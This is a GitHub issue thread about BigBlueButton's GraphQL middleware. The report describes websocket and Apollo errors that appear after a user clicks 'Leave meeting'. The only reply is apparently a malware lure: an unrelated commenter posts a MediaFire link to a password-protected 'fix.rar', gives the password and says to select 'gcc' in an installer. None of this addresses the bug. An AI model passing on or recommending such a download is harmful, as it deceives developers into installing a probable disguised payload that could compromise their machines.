### ISSUE TITLE
Possible bug in the graphql middleware

### ISSUE THREAD

**Issue by JoVictorNunes** [bigbluebutton/bigbluebutton#21026]
**Describe the bug**

Client receives several errors from the graphql websocket when the user leaves the meeting by clicking the "Leave meeting" button.

**To Reproduce**
1. Join a meeting
2. Leave the meeting using the "Leave meeting" button located on the navbar (`userLeaveMeeting` mutation is sent to the server).
3. See several Apollo errors on the console.
4. Graphql websocket receives several errors as well.

**Expected behavior**
No errors on the console. Connection stops gracefully.

**Actual behavior**
No major problems at sight but several errors show up on both the console and the graphql websocket.

**Screenshots**

![Screenshot from 2024-08-26 15-04-14](https://github.com/user-attachments/assets/6672beeb-4cce-4791-b589-3967b59e998e)

![Screenshot from 2024-08-26 15-04-25](https://github.com/user-attachments/assets/9e7f5f29-5b4d-41b1-82ba-c1e460c6f532)

![Screenshot from 2024-08-26 15-05-54](https://github.com/user-attachments/assets/f9233883-da9a-4ef1-afa9-ec1951a9329d)

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
